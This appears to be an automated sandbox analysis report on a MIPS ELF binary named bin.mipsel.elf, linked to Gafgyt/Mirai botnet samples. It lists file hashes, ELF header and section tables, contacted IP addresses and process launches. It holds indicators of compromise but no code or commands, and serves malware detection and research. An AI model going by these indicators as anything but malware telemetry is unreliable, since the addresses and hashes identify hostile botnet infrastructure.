                                                                  • 109.202.202.202
                                                                  bin.armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 109.202.202.202
                                                                  586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 109.202.202.202
                                                                  tftp.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  .i.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 109.202.202.202
                                                                  sshd.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  No context
                                                                  No context
                                                                  No created / dropped files found
                                                                  File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                                  Entropy (8bit):5.135837212431919
                                                                  TrID:
                                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                  File name:bin.mipsel.elf
                                                                  File size:296'136 bytes
                                                                  MD5:25b7df65636b6205023e1f8a1410025b
                                                                  SHA1:c92a5fef6214a7c84c0327e7cce63254a46be4c9
                                                                  SHA256:d27aed220d88d7173e5b738c58d6316aaa0d0ad67e0b0f6d8a9702bf75e28403
                                                                  SHA512:63c634a1c1771ad96adad862cee2272519d590ce51a10f1b712f5abf8d801ebc605aef6be4d6db7c394dc614631b5d83d1618cd11003db100343914aaeb37b7f
                                                                  SSDEEP:3072:4aQ4Upx9iuhlVypZBwfB5ke8fWWlSSTbY7JOLWllj70nnbDE:Oxiu4byfMeoBbU4LWnjIg
                                                                  TLSH:1A54C50A7B519FF7D46FDD3306F98B0124CCB45725A42B3A3270EA5CB91A58B19D38B4
                                                                  File Content Preview:.ELF......................@.4...........4. ...(........p......@...@...........................@...@...........................G...G..V..@...........Q.td................................................@{H....<tz.'!......'.......................<Pz.'!... ..

                                                                  ELF header

                                                                  Class:ELF32
                                                                  Data:2's complement, little endian
                                                                  Version:1 (current)
                                                                  Machine:MIPS R3000
                                                                  Version Number:0x1
                                                                  Type:EXEC (Executable file)
                                                                  OS/ABI:UNIX - System V
                                                                  ABI Version:0
                                                                  Entry Point Address:0x4002a0
                                                                  Flags:0x1007
                                                                  ELF Header Size:52
                                                                  Program Header Offset:52
                                                                  Program Header Size:32
                                                                  Number of Program Headers:4
                                                                  Section Header Offset:295376
                                                                  Section Header Size:40
                                                                  Number of Section Headers:19
                                                                  Header String Table Index:18
                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                  NULL0x00x00x00x00x0000
                                                                  .reginfoMIPS_REGINFO0x4000b40xb40x180x180x2A004
                                                                  .initPROGBITS0x4000cc0xcc0x8c0x00x6AX004
                                                                  .textPROGBITS0x4001600x1600x361800x00x6AX0016
                                                                  .finiPROGBITS0x4362e00x362e00x5c0x00x6AX004
                                                                  .rodataPROGBITS0x4363400x363400x41900x00x2A0016
                                                                  .eh_framePROGBITS0x43a4d00x3a4d00x40x00x2A004
                                                                  .ctorsPROGBITS0x47b0000x3b0000xc0x00x3WA004
                                                                  .dtorsPROGBITS0x47b00c0x3b00c0x80x00x3WA004
                                                                  .jcrPROGBITS0x47b0140x3b0140x40x00x3WA004
                                                                  .data.rel.roPROGBITS0x47b0180x3b0180x1840x00x3WA004
                                                                  .dataPROGBITS0x47b1a00x3b1a00x49b00x00x3WA0032
                                                                  .gotPROGBITS0x47fb500x3fb500xb780x40x10000003WAp0016
                                                                  .sbssNOBITS0x4806c80x406c80x640x00x10000003WAp008
                                                                  .bssNOBITS0x4807300x406c80x65100x00x3WA0016
                                                                  .commentPROGBITS0x00x406c80x177c0x00x0001
                                                                  .mdebug.abi32PROGBITS0x177c0x41e440x00x00x0001
                                                                  .pdrPROGBITS0x00x41e440x63000x00x0004
                                                                  .shstrtabSTRTAB0x00x481440x8a0x00x0001
                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                  <unknown>0xb40x4000b40x4000b40x180x180.98340x4R 0x4.reginfo
                                                                  LOAD0x00x4000000x4000000x3a4d40x3a4d45.52520x5R E0x10000.reginfo .init .text .fini .rodata .eh_frame
                                                                  LOAD0x3b0000x47b0000x47b0000x56c80xbc401.33030x6RW 0x10000.ctors .dtors .jcr .data.rel.ro .data .got .sbss .bss
                                                                  GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 20, 2024 20:16:51.311672926 CEST43928443192.168.2.2391.189.91.42
                                                                  Oct 20, 2024 20:16:56.942989111 CEST42836443192.168.2.2391.189.91.43
                                                                  Oct 20, 2024 20:16:58.478714943 CEST4251680192.168.2.23109.202.202.202
                                                                  Oct 20, 2024 20:17:13.068774939 CEST43928443192.168.2.2391.189.91.42
                                                                  Oct 20, 2024 20:17:23.307292938 CEST42836443192.168.2.2391.189.91.43
                                                                  Oct 20, 2024 20:17:29.450510979 CEST4251680192.168.2.23109.202.202.202
                                                                  Oct 20, 2024 20:17:54.023089886 CEST43928443192.168.2.2391.189.91.42

                                                                  System Behavior

                                                                  Start time (UTC):18:16:48
                                                                  Start date (UTC):20/10/2024
                                                                  Path:/tmp/bin.mipsel.elf
                                                                  Arguments:/tmp/bin.mipsel.elf
                                                                  File size:5773336 bytes
                                                                  MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                  Start time (UTC):18:16:49
                                                                  Start date (UTC):20/10/2024
                                                                  Path:/tmp/bin.mipsel.elf
                                                                  Arguments:-
                                                                  File size:5773336 bytes
                                                                  MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                  Start time (UTC):18:16:49
                                                                  Start date (UTC):20/10/2024
                                                                  Path:/tmp/bin.mipsel.elf
                                                                  Arguments:-
                                                                  File size:5773336 bytes
                                                                  MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9